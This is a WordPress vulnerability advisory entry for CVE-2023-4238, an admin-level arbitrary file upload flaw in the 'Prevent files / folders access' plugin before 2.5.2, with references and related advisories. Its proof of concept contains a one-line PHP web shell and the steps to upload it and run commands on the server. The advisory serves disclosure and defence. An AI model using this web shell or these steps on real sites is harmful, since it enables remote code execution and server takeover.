Prevent files / folders access < 2.5.2 – Admin+ Arbitrary File Upload | CVE 2023-4238 | Plugin Vulnerabilities

Description

The plugin does not validate files to be uploaded, which could allow attackers to upload arbitrary files such as PHP on the server.

Proof of Concept

1) Create a PHP file `cmd.php` with the contents `<?php system($_GET['cmd']); ?>`
2) Go to https://example.com/wp-admin/admin.php?page=mo_media_restrict&tab=private_directory
3) Then upload a file with the PHP extension
4) Follow the link https://example.com/wp-content/uploads/protectedfiles/{filename}.php?cmd=ps+aux
5) You will be able to see a list of processes when the PHP is executed

Affects Plugins

prevent-file-access

Fixed in 2.5.2

References

CVE

URL

https://blog.cleantalk.org/prevent-files-folders-access-2-5-2-remote-code-execution

Miscellaneous

Original Researcher

Dmitrii

Submitter

Dmitrii

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

53816136-4b1a-4b7d-b73b-08a90c2a638f

Timeline

Publicly Published

2023-08-28 (about 2 years ago)

Added

2023-08-30 (about 2 years ago)

Last Updated

2023-09-01 (about 2 years ago)

Other

Published

Title

Published

2021-06-28

Title

ProfilePress 3.0 - 3.1.3 - Arbitrary File Upload in File Uploader Component

Published

2024-12-17

Title

WPLMS < 1.9.9.5.3 - Authenticated (Subscriber+) Arbitrary File Upload

Published

2022-09-07

Title

Frontend File Manager < 21.3 - Subscriber+ Arbitrary File Upload

Published

2014-08-01

Title

seo-spy-google - ofc_upload_image.php Arbitrary File Upload

Published

2014-08-01

Title

wp-powerplaygallery - Arbitrary File Upload